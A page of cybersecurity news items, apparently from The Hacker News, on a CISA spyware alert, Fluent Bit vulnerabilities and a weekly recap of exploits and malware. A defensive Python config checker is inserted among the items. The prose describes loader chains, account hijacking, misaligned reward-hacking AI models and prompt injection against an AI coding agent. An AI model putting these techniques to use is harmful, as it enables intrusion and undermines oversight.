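        print(f"  offset {off:#x} block {code}: {token}")
```

    A hit is a reason to open the file with Auto Run off (Blender also accepts `--disable-autoexec` on the command line) and read the Text datablocks in the Text Editor before trusting them; a clean scan is not proof of safety, because a script can build its strings at runtime.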


    Source: thehackernews.com…

  • CISA Warns of Active Spyware Campaigns Hijacking High-Value Signal and WhatsApp Users

    Nov 25, 2025 | Ravie Lakshmanan | Spyware / Mobile Security

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday issued an alert warning of bad actors actively leveraging commercial spyware and remote access trojans (RATs) to target users of mobile messaging applications.

    “These cyber actors use sophisticated targeting and social engineering techniques to deliver spyware and gain unauthorized access to a victim’s messaging app, facilitating the deployment of additional malicious payloads that can further compromise the victim’s mobile device,” the agency said.

    CISA cited as examples multiple campaigns that have come to light since the start of the year. Some of them include –

    • The targeting of the Signal messaging app by multiple Russia-aligned threat actors by taking advantage of the service’s “linked devices” feature to hijack target user accounts
    • Android spyware campaigns codenamed ProSpy and ToSpy that impersonate apps like Signal and ToTok to target users in the United Arab Emirates to deliver malware that establishes persistent access to compromised Android devices and exfiltrates data
    • An Android spyware campaign called ClayRat has targeted users in Russia using Telegram channels and lookalike phishing pages by impersonating popular apps like WhatsApp, Google Photos, TikTok, and YouTube to trick users into installing them and steal sensitive data
    • A targeted attack campaign that likely chained two security flaws in iOS and WhatsApp (CVE-2025-43300 and CVE-2025-55177) to target fewer than 200 WhatsApp users
    • A targeted attack campaign that involved the exploitation of a Samsung security flaw (CVE-2025-21042) to deliver an Android spyware dubbed LANDFALL to Galaxy devices in the Middle East

    The agency said the threat actors use multiple tactics to achieve compromise, including device-linking QR codes, zero-click exploits, and distributing spoofed versions of messaging apps.

    CISA also pointed out that these activities focus on high-value individuals, primarily current and former high-ranking government, military, and political officials, along with civil society organizations and individuals across the United States, the Middle East, and Europe.

    To counter the threat, the agency is urging highly targeted individuals to review and adhere to the following best practices –

    • Only use end-to-end encrypted (E2EE) communications
    • Enable Fast Identity Online (FIDO) phishing-resistant authentication
    • Move away from Short Message Service (SMS)-based multi-factor authentication (MFA)
    • Use a password manager to store all passwords
    • Set a telecommunications provider PIN to secure mobile phone accounts
    • Periodically update software
    • Opt for the latest hardware version from the cell phone manufacturer to maximize security benefits
    • Do not use a personal virtual private network (VPN)
    • On iPhones, enable Lockdown Mode, enroll in iCloud Private Relay, and review and restrict sensitive app permissions
    • On Android phones, choose phones from manufacturers with strong security track records, only use Rich Communication Services (RCS) if E2EE is enabled, turn on Enhanced Protection for Safe Browsing in Chrome, ensure Google Play Protect is on, and audit and limit app permissions


    Source: thehackernews.com…

  • New Fluent Bit Flaws Expose Cloud to RCE and Stealthy Infrastructure Intrusions

    Nov 24, 2025 | Ravie Lakshmanan | Vulnerability / Container Security

    Cybersecurity researchers have discovered five vulnerabilities in Fluent Bit, an open-source and lightweight telemetry agent, that could be chained to compromise and take over cloud infrastructures.

    The security defects “allow attackers to bypass authentication, perform path traversal, achieve remote code execution, cause denial-of-service conditions, and manipulate tags,” Oligo Security said in a report shared with The Hacker News.

    Successful exploitation of the flaws could enable attackers to disrupt cloud services, manipulate data, and burrow deeper into cloud and Kubernetes infrastructure. The list of identified vulnerabilities is as follows –

    • CVE-2025-12972 – A path traversal vulnerability stemming from the use of unsanitized tag values to generate output filenames, making it possible to write or overwrite arbitrary files on disk, enabling log tampering and remote code execution.
    • CVE-2025-12970 – A stack buffer overflow vulnerability in the Docker Metrics input plugin (in_docker) that could allow attackers to trigger code execution or crash the agent by creating containers with excessively long names.
    • CVE-2025-12978 – A vulnerability in the tag-matching logic lets attackers spoof trusted tags – which are assigned to every event ingested by Fluent Bit – by guessing only the first character of a Tag_Key, allowing an attacker to reroute logs, bypass filters, and inject malicious or misleading records under trusted tags.
    • CVE-2025-12977 – An improper input validation of tags derived from user-controlled fields, allowing an attacker to inject newlines, traversal sequences, and control characters that can corrupt downstream logs.
    • CVE-2025-12969 – A missing security.users authentication in the in_forward plugin that’s used to receive logs from other Fluent Bit instances using the Forward protocol, allowing attackers to send logs, inject false telemetry, and flood a security product’s logs with false events.

    “The amount of control enabled by this class of vulnerabilities could allow an attacker to breach deeper into a cloud environment to execute malicious code through Fluent Bit, while dictating which events are recorded, erasing or rewriting incriminating entries to hide their tracks after an attack, injecting fake telemetry, and injecting plausible fake events to mislead responders,” researchers said.

    Following responsible disclosure, the issues have been addressed in versions 4.1.1 and 4.0.12, released last month. Amazon Web Services (AWS), which also took part in the coordinated disclosure, has urged customers running Fluent Bit to update to the latest version.

    Given Fluent Bit’s popularity in enterprise environments, the shortcomings could let attackers impair access to cloud services, tamper with data, and seize control of the logging service itself.

    Other recommended actions include avoiding use of dynamic tags for routing, locking down output paths and destinations to prevent tag-based path expansion or traversal, mounting /fluent-bit/etc/ and configuration files as read-only to block runtime tampering, and running the service as non-root users.
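    As an added example, not code from Oligo's report or from the Fluent Bit project, the following Python checker parses Fluent Bit's classic configuration format and flags the settings those recommendations target: an in_forward listener with neither Shared_Key nor Security.Users, an in_http input whose Tag_Key lets the sender choose the tag that drives routing, a file output that takes its filename from the tag because File is unset, and the built-in HTTP server bound to all interfaces. The WEAK_CONFIG and HARDENED_CONFIG samples are constructed for this example; the option names are Fluent Bit's own, but mapping each finding to a CVE class is this example's reading of the advisory, not the vendor's. Running as non-root and mounting /fluent-bit/etc/ read-only are deployment controls that live outside the config file and are not checked here.

```python
import re
from dataclasses import dataclass, field


@dataclass
class Section:
    kind: str                                   # SERVICE, INPUT, FILTER, OUTPUT, ...
    props: dict = field(default_factory=dict)   # lower-cased key -> value string


def parse_classic_config(text: str) -> list:
    """Parse Fluent Bit's classic (indented, INI-like) config format into sections."""
    sections = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("@"):   # comments, @INCLUDE/@SET
            continue
        m = re.fullmatch(r"\[(\w+)\]", line)
        if m:
            sections.append(Section(m.group(1).upper()))
            continue
        if not sections:
            raise ValueError(f"property outside a section: {raw!r}")
        parts = re.split(r"\s+", line, maxsplit=1)          # "Key   value with spaces"
        sections[-1].props[parts[0].lower()] = parts[1].strip() if len(parts) > 1 else ""
    return sections


def audit_fluent_bit_config(text: str) -> list:
    """Return one finding string per weak setting; an empty list means nothing was flagged."""
    findings = []
    for s in parse_classic_config(text):
        plugin = s.props.get("name", "").lower()
        if (s.kind == "SERVICE" and s.props.get("http_server", "off").lower() == "on"
                and s.props.get("http_listen", "0.0.0.0") == "0.0.0.0"):
            findings.append("SERVICE: built-in HTTP server is bound to all interfaces; "
                            "set HTTP_Listen 127.0.0.1 or turn HTTP_Server off")
        if (s.kind == "INPUT" and plugin == "forward"
                and "shared_key" not in s.props and "security.users" not in s.props):
            findings.append("INPUT forward: no Shared_Key or Security.Users, so any host that can reach "
                            "the port can inject records (CVE-2025-12969 class)")
        if s.kind == "INPUT" and plugin == "http" and "tag_key" in s.props:
            findings.append("INPUT http: Tag_Key lets the sender choose the tag, which then drives "
                            "routing and file names; use a fixed Tag instead")
        if s.kind == "OUTPUT" and plugin == "file" and "file" not in s.props:
            findings.append("OUTPUT file: no File option, so the file name is taken from the tag "
                            "(CVE-2025-12972 class); set File to a fixed name")
    return findings


# Constructed sample configs for this example (not from the advisory or the Fluent Bit project).
WEAK_CONFIG = """
[SERVICE]
    Flush        1
    HTTP_Server  On
    HTTP_Port    2020

[INPUT]
    Name         forward
    Listen       0.0.0.0
    Port         24224

[INPUT]
    Name         http
    Port         8888
    Tag_Key      tag

[OUTPUT]
    Name         file
    Match        *
    Path         /var/log/fluent-bit
"""

HARDENED_CONFIG = """
[SERVICE]
    Flush          1
    HTTP_Server    On
    HTTP_Listen    127.0.0.1
    HTTP_Port      2020

[INPUT]
    Name            forward
    Listen          0.0.0.0
    Port            24224
    Shared_Key      replace-with-a-long-random-secret
    Self_Hostname   collector-01
    Security.Users  agent  replace-with-a-strong-password

[INPUT]
    Name         http
    Port         8888
    Tag          app.http

[OUTPUT]
    Name         file
    Match        app.*
    Path         /var/log/fluent-bit
    File         app.log
"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        findings = audit_fluent_bit_config(cfg)
        print(f"{label}: {len(findings)} finding(s)")
        for f in findings:
            print("  -", f)
```

    The checker is deliberately conservative: it only reads the classic format, not the YAML one, and it reports settings, not exploitability. Pair it with the version check (4.1.1 / 4.0.12 or later), because a fixed File name stops the tag from choosing the path but does nothing for the in_docker overflow or the tag-matching bug.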

    The development comes more than a year after Tenable detailed a flaw in Fluent Bit’s built-in HTTP server (CVE-2024-4323 aka Linguistic Lumberjack) that could be exploited to achieve denial-of-service (DoS), information disclosure, or remote code execution.


    Source: thehackernews.com…

  • ⚡ Weekly Recap: Fortinet Exploit, Chrome 0-Day, BadIIS Malware, Record DDoS, SaaS Breach & More

    Nov 24, 2025 | Ravie Lakshmanan | Cybersecurity / Hacking News

    This week saw a lot of new cyber trouble. Hackers hit Fortinet and Chrome with new 0-day bugs. They also broke into supply chains and SaaS tools. Many hid inside trusted apps, browser alerts, and software updates.

    Big firms like Microsoft, Salesforce, and Google had to react fast — stopping DDoS attacks, blocking bad links, and fixing live flaws. Reports also showed how fast fake news, AI risks, and attacks on developers are growing.

    Here’s what mattered most in security this week.

    ⚡ Threat of the Week

    Fortinet Warns of Another Silently Patched and Actively Exploited FortiWeb Flaw — Fortinet has warned that a new security flaw in FortiWeb has been exploited in the wild. The medium-severity vulnerability, tracked as CVE-2025-58034, carries a CVSS score of 6.7 out of a maximum of 10.0. It has been addressed in version 8.0.2. “An Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) vulnerability [CWE-78] in FortiWeb may allow an authenticated attacker to execute unauthorized code on the underlying system via crafted HTTP requests or CLI commands,” the company said. The development came days after Fortinet confirmed that it silently patched another critical FortiWeb vulnerability (CVE-2025-64446, CVSS score: 9.1) in version 8.0.2. Although the company has not clarified if the exploitation activity is linked, Orange Cyberdefense said it observed “several exploitation campaigns” chaining CVE-2025-58034 with CVE-2025-64446 to facilitate authentication bypass and command injection. Fortinet’s handling of the issue has come in for heavy criticism. It’s possible that the company was aware but chose not to disclose them to avoid alerting other threat actors to their existence until a majority of its customers had applied the patch. But what’s difficult to explain at this stage is why Fortinet opted to disclose the flaws four days apart.

    🔔 Top News

    • Google Patches New Actively Exploited Chrome 0-Day — Google released security updates for its Chrome browser to address two security flaws, including one that has come under active exploitation in the wild. The vulnerability in question is CVE-2025-13223 (CVSS score: 8.8), a type confusion vulnerability in the V8 JavaScript and WebAssembly engine that could be exploited to achieve arbitrary code execution or program crashes. Clément Lecigne of Google’s Threat Analysis Group (TAG) has been credited with discovering and reporting the flaw on November 12, 2025. Google has not shared any details on who is behind the attacks, who may have been targeted, or the scale of such efforts. However, the tech giant acknowledged that an “exploit for CVE-2025-13223 exists in the wild.” With the latest update, Google has addressed seven zero-day flaws in Chrome that have been either actively exploited or demonstrated as a proof-of-concept (PoC) since the start of the year.
    • Matrix Push C2 Uses Browser Extensions to Take Users to Phishing Pages — Bad actors are leveraging browser notifications as a vector for phishing attacks to distribute malicious links by means of a new command-and-control (C2) platform called Matrix Push C2. In these attacks, prospective targets are tricked into allowing browser notifications through social engineering on malicious or legitimate-but-compromised websites. Once a user agrees to receive notifications from the site, the attackers take advantage of the web push notification mechanism built into the web browser to send alerts that look like they have been sent by the operating system or the browser itself. The service is available for about $150 for one month, $405 for three months, $765 for six months, and $1,500 for a full year. The fact that the tool is platform-agnostic means it could be favoured by threat actors looking to conduct credential theft, payment fraud, and cryptocurrency scams. Countering such risks requires browser vendors to implement stronger abuse protections, such as using a reputation system to flag sketchy sites and automatically revoking notification permissions for suspicious sites.
    • PlushDaemon APT Uses EdgeStepper to Hijack Software Updates — The threat actor known as PlushDaemon has been observed using a previously undocumented Go-based network backdoor codenamed EdgeStepper to facilitate adversary-in-the-middle (AitM) attacks. EdgeStepper is positioned between a victim and the network edge, tracking requests for certain popular Chinese software products, such as the Sogou Pinyin Method input editor, the Baidu Netdisk cloud service, multipurpose instant messenger Tencent QQ, and the free office suite WPS Office. If one such software update request is found EdgeStepper will redirect it to PlushDaemon’s infrastructure, resulting in the download of a trojanized update. The attacks lead to the deployment of SlowStepper.
    • Salesforce Warns of Unauthorized Data Access via Gainsight-Linked Apps — Salesforce alerted customers of “unusual activity” related to Gainsight-published applications connected to the platform. The cloud services firm said it has taken the step of revoking all active access and refresh tokens associated with Gainsight-published applications connected to Salesforce. It has also temporarily removed those applications from the AppExchange as its investigation continues. Gainsight said the Gainsight app has been temporarily pulled from the HubSpot Marketplace and Zendesk connector access has been revoked as a precautionary measure. The campaign has been attributed by Google to ShinyHunters, with the group assessed to have stolen data from more than 200 potentially affected Salesforce instances. Cybersecurity company CrowdStrike also said it terminated a “suspicious insider” last month for allegedly passing insider information to Scattered LAPSUS$ Hunters. A member of the extortionist crew told The Register they obtained access to Gainsight following the Salesloft Drift hack earlier this year. The incident once again underscores the security risk posed by the SaaS integration supply chain, where breaching a single vendor acts as a gateway into dozens of downstream environments.
    • Microsoft Mitigates Record 15.72 Tbps DDoS Attack — Microsoft disclosed that it automatically detected and neutralized a distributed denial-of-service (DDoS) attack targeting a single endpoint in Australia that measured 15.72 terabits per second (Tbps) and nearly 3.64 billion packets per second (pps). The tech giant said it was the largest DDoS attack ever observed in the cloud, and that it originated from a TurboMirai-class Internet of Things (IoT) botnet known as AISURU. It’s currently not known who was targeted by the attack. According to data from QiAnXin XLab, the AISURU botnet is powered by nearly 300,000 infected devices, most of which are routers, security cameras, and DVR systems. It has been attributed to some of the biggest DDoS attacks recorded to date. In a report published last month, NETSCOUT classified the DDoS-for-hire botnet as operating with a restricted clientele. QiAnXin XLab told The Hacker News that a botnet named Kimwolf is likely linked to the group behind AISURU, adding one of Kimwolf’s C2 domains recently surpassed Google in Cloudflare’s list of top 100 domains, specifically, 14emeliaterracewestroxburyma02132[.]su.

    ‎️‍🔥 Trending CVEs

    Hackers act fast. They can use new bugs within hours. One missed update can cause a big breach. Here are this week’s most serious security flaws. Check them, fix what matters first, and stay protected.

    This week’s list includes — CVE-2025-9501 (W3 Total Cache plugin), CVE-2025-62765 (Lynx+ Gateway), CVE-2025-36251, CVE-2025-36250 (IBM AIX), CVE-2025-60672, CVE-2025-60673, CVE-2025-60674, CVE-2025-60676 (D-Link DIR-878 routers), CVE-2025-40547, CVE-2025-40548, CVE-2025-40549 (SolarWinds Serv-U), CVE-2025-40601 (SonicWall SonicOS), CVE-2025-50165 (Windows Graphics), CVE-2025-9316, CVE-2025-11700 (N-able N-central), CVE-2025-13315, CVE-2025-13316 (Twonky Server), CVE-2024-24481, CVE-2025-13207 (Tenda N300 series and Tenda 4G03 Pro), CVE-2025-13051 (ASUSTOR), CVE-2025-49752 (Azure Bastion), CVE-2024-48949, CVE-2024-48948 (elliptic), and a TLS verification bypass vulnerability in GoSign Desktop (no CVE).

    📰 Around the Cyber World

    • Malicious VS Code Extension Taken Down — A malicious Visual Studio Code extension was found attempting to capitalize on the legitimate “Prettier” brand to harvest sensitive data. The extension, named “publishingsofficial.prettier-vscode-plus,” was published to the Microsoft Extension Marketplace on November 21, 2025. The extension, once installed, launches a batch script that’s responsible for running a Visual Basic Script file designed to execute a stealer malware. “The payload system inserted into the malicious extension appears designed to evade common anti-malware and static scanning tactics,” Checkmarx said. “It’s a multi-stage attack that ends with deploying and running what appears to be a variant of the Anivia Stealer malware; this malware acquires and exfiltrates credentials, metadata, and private information like WhatsApp chats from Windows machines.” The extension has since been taken down.
    • 100s of English-Language Websites Link to Pro-Kremlin Propaganda — A new study from the Institute for Strategic Dialogue (ISD) has revealed that, between July 2024 and July 2025, hundreds of English-language websites, including news outlets, fact-checkers, and academic institutions, linked to articles from a pro-Kremlin network named Pravda that’s flooding the internet with disinformation. “Roughly 900 sites from across the political spectrum, ranging from major news outlets to fringe blogs, have linked to Pravda network articles over the observed year-long period,” ISD said. “A reviewed sample of more than 300 English-language sites included U.S. national and local news outlets, prominent sources of political commentary, as well as fact-checking and academic institutions.” It’s assessed that the Pravda network uses a high-volume strategy to influence large language models (LLMs) like ChatGPT and Gemini and seed them with pro-Russia narratives, a process referred to as LLM grooming. The network has been active since 2014, churning out more than 6 million articles.
    • Anthropic Finds Reward Hacking Leads to More Misalignment — A new study from artificial intelligence (AI) company Anthropic revealed that large language models (LLMs) trained to “reward hack” by cheating on coding tasks exhibit even more misaligned behavior, including sabotaging AI safety research. “When they learn to cheat on software programming tasks, they go on to display other, even more misaligned behaviors as an unintended consequence,” the company said. “These include concerning behaviors like alignment faking and sabotage of AI safety research.”
    • Microsoft to Include Sysmon in Windows 11 — Microsoft said it will build Sysmon, a tool from its Sysinternals suite, into future versions of Windows 11 to help with security log analysis. “Next year, Windows updates for Windows 11 and Windows Server 2025 will bring Sysmon functionality natively to Windows,” the tech giant said. “Sysmon functionality allows you to use custom configuration files to filter captured events. These events are written to the Windows event log, enabling a wide range of use cases, including by security applications.”
    • More Than 150 Remcos RAT Servers Found — Attack surface management platform Censys said it consistently tracked over 150 active Remcos RAT command-and-control (C2) servers between October 14 and November 14, 2025. “Most servers listened on port 2404, commonly associated with Remcos, with additional use of ports 5000, 5060, 5061, 8268, and 8808, showing deployment flexibility,” the company said. “A subset of hosts exposed Server Message Block (SMB) and Remote Desktop Protocol (RDP), suggesting some operators also use native Windows services for administration. Hosting concentrated in the United States, the Netherlands, and Germany, with smaller clusters in France, the United Kingdom, Turkey, and Vietnam.”
    • PyPI to Require Email Verification for TOTP Logins — The Python Package Index (PyPI) portal will now require email-based verification for all Time-based One-Time Password (TOTP) logins coming from new developer devices. “Users who have enabled WebAuthn (security keys) or passkeys for 2FA will not see any changes, as these methods are inherently phishing-resistant,” PyPI said. “They cryptographically bind the authentication to the specific website (origin), meaning an attacker cannot trick you into authenticating on a fake site, unlike TOTP codes, which can be phished.”
    • Blockade Spider’s Cross-Domain Attacks Detailed — A financially motivated threat actor known as Blockade Spider has been attributed to using cross-domain techniques in its ransomware campaigns since at least April 2024. The e-crime group uses Embargo ransomware and data theft to monetize their operations. “They gain access through unmanaged systems, dump credentials, and move laterally to virtualized infrastructure to remotely encrypt files with Embargo ransomware,” CrowdStrike said. “They’ve also demonstrated the ability to target cloud environments.” In one case previously flagged by the company, the threat actor added compromised users to a “No MFA” Active Directory group, circumvented security controls, and deployed ransomware while evading traditional detection systems.
    • JSGuLdr Loader Delivers Phantom Stealer — A new multi-stage JavaScript-to-PowerShell loader has been put to use in cyber attacks, delivering an information stealer called Phantom Stealer. “A JavaScript file triggers PowerShell through an Explorer COM call, pulls the second stage from %APPDATA%Registreri62, then uses Net.WebClient to fetch an encrypted payload from Google Drive into %APPDATA%Autorise131[.]Tel,” ANY.RUN said. “The payload is decoded in memory and loaded, with PhantomStealer injected into msiexec.exe.” The attack combines obfuscation and fileless in-memory loading techniques to sidestep detection. Because the final payload runs entirely in memory inside a trusted process, it allows threat actors to stealthily move across the network and steal data.
    • Apple Updates App Store Developer Guidelines — Apple updated its developer guidelines to require every app to disclose if it collects and shares user data with AI companies, as well as ask users for permissions. “You must clearly disclose where personal data will be shared with third parties, including with third-party AI, and obtain explicit permission before doing so,” the company’s rule 5.1.2(i) now states. The changes went into effect on November 13, 2025.
    • Malware Campaign Targets Microsoft IIS servers to Deploy BadIIS Malware — A malware campaign dubbed WEBJACK has been observed compromising Microsoft IIS servers to deploy malicious IIS modules belonging to the BadIIS malware family. “The hijacked servers are being abused for SEO poisoning and fraud, redirecting users to casino, gambling, or betting websites,” WithSecure said. “The threat actor has compromised high-profile targets, including government institutions, universities, tech firms, and many other organizations, abusing their domain reputation to serve fraudulent content through search engine results pages (SERPs).” The initial access vector used in the attacks is not known, although previous BadIIS intrusions have leveraged vulnerable web applications, stolen administrator credentials, and purchased access from initial-access brokers. The tools and operational characteristics observed point to a strong Chinese nexus, a pattern evidenced by the discovery of similar clusters in recent months, such as GhostRedirector, Operation Rewrite, UAT-8099, and TOLLBOOTH.
    • Phishing Scheme Targets WhatsApp Accounts — Hundreds of victims across the Middle East, Asia, and beyond have been ensnared in a new scam that leverages cloned login portals, low-cost domains, and WhatsApp’s own “Linked Devices” and one-time password workflows to hijack WhatsApp accounts. “Threat actors behind this campaign create fraudulent websites that closely imitate legitimate WhatsApp interfaces, using urgency-driven tactics to trick users into compromising their accounts,” CTM360 said. The campaign has been codenamed HackOnChat. Over 9,000 phishing URLs have been uncovered to date, with the sites hosted on domains registered with low-cost or less regulated top-level domains such as .cc, .net, .icu, and .top. In the last 45 days, more than 450 incidents were recorded. “The attackers rely on two primary techniques: Session Hijacking, where the WhatsApp-linked device feature is exploited to hijack WhatsApp web sessions, and the Account Takeover, which involves tricking victims into revealing their authentication key to seize full ownership of their accounts,” the company added. “Malicious links are using templates of fake security-alert verification, deceptive WhatsApp Web imitation pages, and spoofed group invitation messages, all designed to lure users into these traps and enable the hacking process.”
    • Spike in Palo Alto Networks GlobalProtect Scanning — Threat intelligence firm GreyNoise has warned of another wave of scanning activity targeting Palo Alto Networks GlobalProtect portals. “Beginning on 14 November 2025, activity rapidly intensified, culminating in a 40x surge within 24 hours, marking a new 90-day high,” the company said. Between November 14 and 19, 2.3 million sessions hitting the */global-protect/login.esp URI were observed. It’s assessed that these attacks are the work of the same threat actor based on the recurring TCP/JA4t signatures and overlapping infrastructure.
    • JustAskJacky is the Most Prevalent Threat in October 2025 — A malware family known as JustAskJacky emerged as the most pervasive threat in October 2025, followed by KongTuke, Rhadamanthys, NetSupport RAT, and TamperedChef, according to data from Red Canary. JustAskJacky, which emerged earlier this year, is a “family of malicious NodeJS applications that masquerade as a helpful AI or utility tool while conducting reconnaissance and executing arbitrary commands in memory in the background.”
    • NSO Group Seeks to Overturn WhatsApp Case — Last month, a U.S. court ordered Israeli commercial spyware vendor NSO Group to stop targeting WhatsApp. In response, the company has filed an appeal to overturn the ruling, arguing that it will “suffer irreparable, potentially existential injuries” and be forced out of business. “And the injunction prohibits NSO from engaging in entirely lawful conduct to develop, license, and sell products used in authorized government investigations — a prohibition that would devastate NSO’s business and could well force it out of business entirely,” the motion reads.
    • Ohio Contractor Pleads Guilty to Hacking Former Employer — Maxwell Schultz, a 35-year-old man from Ohio, pleaded guilty to charges related to hacking into the network of his former employer. The incident took place in 2021, after the unnamed company terminated Schultz’s employment in its IT department. According to the U.S. Justice Department, Schultz accessed the company’s network by impersonating another contractor to obtain login credentials. “He ran a PowerShell script that reset approximately 2,500 passwords, locking thousands of employees and contractors out of their computers nationwide,” the department said. “Schultz also searched for ways to delete logs, PowerShell window events and cleared multiple system logs.” The incident caused the company $862,000 in losses. Schultz admitted that he conducted the attack because “he was upset about being fired.” He faces up to 10 years in federal prison and a possible $250,000 maximum fine.
    • Security Flaws in Cline Bot AI — Security vulnerabilities have been discovered in Cline, an open-source AI coding assistant, that could expose its users to prompt injection and malicious code execution when opening specially crafted source code repositories. The issues were addressed in Cline v3.35.0. “System prompts are not harmless configuration text. They shape agent behavior, influence privilege boundaries, and significantly increase attacker leverage when exposed verbatim,” Mindgard researcher Aaron Portnoy said. “Treating prompts as non-sensitive overlooks the reality that modern agents combine language, tools, and code execution into a single operational surface. Securing AI agents like Cline requires recognizing that prompts, tool wiring, and agent logic are tightly connected, and each must be handled as part of the security boundary.”

    🎥 Cybersecurity Webinars

    • Guardrails for Chaos: How to Patch Fast Without Opening the Door to Attackers — Community tools like Chocolatey and Winget help teams patch software fast. But they can also hide risks — old code, missing checks, and unsafe updates. Gene Moody from Action1 shows how to use these tools safely, with clear steps to keep speed and security in balance.
    • Meet WormGPT, FraudGPT, and SpamGPT — the Dark Side of AI You Need to See — AI tools are now helping criminals send fake emails. Names like WormGPT, FraudGPT, and SpamGPT can write or send these messages fast. They make emails that look real and can fool people and filters. Many security tools can’t keep up. Leaders need to see how these attacks work and learn how to stop them before passwords get stolen.
    • Misconfigurations, Misuse, and Missed Warnings: The New Cloud Security Equation — Hackers are finding new ways to break into cloud systems. Some use weak identity settings in AWS. Others hide bad AI models by copying real ones. Some take too many permissions in Kubernetes. The Cortex Cloud team will show how their tools can spot these problems early and help stop attacks before they happen.

    🔧 Cybersecurity Tools

    • YAMAGoya — A new free tool from JPCERT/CC. It helps find strange or unsafe actions on Windows in real time. It watches files, programs, and network moves, and checks memory for hidden threats. It uses Sigma and YARA rules made by the security community. You can run it with a window or from the command line. It also saves alerts to Windows logs so other tools can read them.
    • Metis — A free tool made by Arm’s Product Security Team. It uses AI to check code for security problems. It helps find small bugs that normal tools miss. It works with C, C++, Python, Rust, and TypeScript. You can run it on your computer or add it to your build system.

    Disclaimer: These tools are for learning and research only. They haven’t been fully tested for security. If used the wrong way, they could cause harm. Check the code first, test only in safe places, and follow all rules and laws.

    Conclusion

    Each week proves that the cyber threat landscape never stands still. From patched vulnerabilities to sprawling botnets and inventive new attack methods, defenders are locked in a constant race to stay ahead. Even small lapses — a missed update or a weak integration — can create major openings for attackers.

    Staying ahead demands attention to detail, lessons from every breach, and quick action when alerts appear. As the boundary between software and security continues to blur, awareness remains our strongest line of defense.

    Stay tuned for next week’s RECAP, where we track the threats, patches, and patterns shaping the digital world.


    Source: thehackernews.com…